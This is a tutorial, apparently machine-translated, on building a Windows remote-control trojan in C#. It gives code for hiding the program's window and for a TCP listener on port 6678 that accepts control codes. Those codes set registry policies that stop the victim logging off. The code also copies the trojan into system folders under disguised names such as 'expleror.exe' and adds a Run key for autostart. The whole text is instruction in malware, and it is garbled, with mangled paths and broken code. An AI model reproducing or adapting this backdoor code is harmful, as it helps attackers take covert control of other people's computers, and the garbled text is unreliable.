Service development:
To achieve the procedure of Trojan service, it is mainly to achieve the following functions: the operation of the background (hidden technology), the reception of the control code and the modification of the registry, the following introduction to these three aspects:
1. In the VC #, establish a background service program is easy, first create a new C # Windows application, the project name is self-defined (but to hide the name and the name of the system), the form properties " The showintaskbar "property is set to false, let it run in the taskbar when running, and set the property" WindowsTate "property to MININIZED, so that the form can be hidden. Of course, you can also set up in InitializationComponent (), this function is initialized, running before the form is displayed, the code is as follows:
Private void initializeComponent () {// // Form1 // // Form display starting and size this.AutoscaleBaseSize = new system.drawing.size (6, 14); this.clientsize = new system.drawing.size (368 , 357); // Form Name This.Name = "FORM1"; // Setting the property to run this.showintaskbar = false in the background; this.text = "form1"; this.WindowState = system.Windows.Forms.FormWindowState .Minimized;
2
Public Form1 () // Form constructor {// // Windows Form Designer Support for // InitializeComponent ();
// // Todo: Add any constructor code after INITIALIZECMOMPONENT / / Add Your Listening Code // You can be set, I use fixed port INT port = 6678; //system.net.sockets .Tcplistener is a listner = new tcplistener (port) used to listen to the client in the TCP network; // launch the listener listener.Start (); // increase the thread of the received control code, if you want to stop the thread can be used with thread.abort () // recontrolcode is a function of thread startup execution. This function selects the appropriate registry modification function thread thread = new thread (New Threadstart ()); thread.start ();} recontrolcode If the function is as follows, the full code see the program private void recontrolcode () {// Setting the receiving socket, receive listener.acceptsocket is the request for the client that has received Socket (); // If the connection is successfully executed, WHILE (Socket) .Connected) {// Receive control code byte [] by = new byte [6]; int i = socket.receive (by, by.length, 0); string ss = system.text.Encoding.ascii.getstring (by ); // perform different functions according to the control code
// Modify the Registry Add to Code Switch (SS) {case "jiance": // Test connection, return to test information str = "hjc"; Byte [] bytee = system.text.Encoding.ascii.getbytes (STR); Socket.send (Bytee, 0, Bytee.Length, 0); Break; Case "ZX1000": // Modify the registry function, self-defined, see the following analysis unlogoff (); // return control message RetMessage (); Break; CASE "zx0100": // Modify the registry function unclose (); // Return the control message RetMessage (); Break; // Repeat the Case function as front, slightly off Default: Break;} // case} // While } // private void recontrolcode
3. Implement the registry in the C #, use the system.microsoft.win32 command space in the .NET class library, which provides two types of classes: Processing the class that caused by the operating system and the system registry the type. Below you can see its usage. Here I have made a subroutine that modifies the registry: make the computer can't log out. Before this, you can understand the registry, in sub-key Software // Microsoft // windows // currentversion // policies // Explorer, the key value nologoff is 1 to make the computer can not log out. In the following functions, use C # to implement the modification of the registry:
Private void unlogoff () {// Get the top-level node of the host's registry microsoft.win32.registryKey rlocal = registry.localmachine; // Set a registry key key1; try {// function registryKey.OpenSubkey (String RegistryKey, Bool CanWrite Retrieve the specified sub-key // registryKey is the key value specified by the user, canwrite can modify it, default is FASLE inexposed key1 = rlocal.opensubkey ("Software // Microsoft // Windows // CurrentVersion / / Policies // Explorer ", true); // Set the key name of the subkey, and the value Key1.SetValue (" NOLOGOFF ", 1); // Close the open sub-key Key1.close (); // Warning string Set mystr = mystr "HKEY_LOCAL_MACHINE / / SOFTWARE // Microsoft // WINDWARE // CurrentVersion // Policies // Explorer key value NOLOGOFF is modified! Please set it to 0!";} Catch {} // If there is no Self-established if (key1 == null) {try {// uses the registrykey.createSubkey (String MyString) function to establish the sub-key key key2 = rlocal.createSubkey ("Software // Microsoft // Windows // CurrentVersion /// Policies // Explorer "); Key2.SetValue (" NOLOGOFF ", 1); key2.close (); mystr = mystr hkey_local_machine // Software // microsoft // windows // costversion // policies // Explorer key value NOLOGOFF is modified! Please set it to 0! ";} Catch {}}} 4, there is an important function in the Trojan program is self-copying and transfer. Trojans must automatically hide Trojans in SYSTEM, SYSTEM32, to prevent discovery. The transfer code analysis is as follows, the functionality of the main implementation is to transfer the Trojans under the D to C: //winnnt//system/Msdoss.exe, and the name is changed. Used .NET namespace system.io, its role is to allow synchronous and asynchronous reading and writing of data streams and files. Here we use the System.IO.File class.
Private Void Movecc1 () {Try {// Fun.move (String SourceFileName, String Destfilename) The action of the mobile file // sourceFileName is the file name to move, DestFileName is the new path for the file file.move ("C: / /Winnnt//system/Msdoss.exe", "d://winnt//system32//expleror.exe ");} catch {} // Set the new moving Trojan to self-start. Analysis and front Try {key1 = rlocal.opensubKey ("Software // Microsoft // Run", true); Key1.SetValue ("MicrosoftT", "D: //winnt/system32//expleror.exe" ); key1.close ();} catch {} if (key1 == null) {Try {registryKey key2 = rlocal.createSubkey ("Software // Microsoft // Windows // CurrentVersion // Run"); Key1.SetValue "MicrosoftT", "D: //winnt//system32//expleror.exe"); key1.close ();} catch {}}} // Movec1 () to the Trojan of a simple C # hip hip to finish.
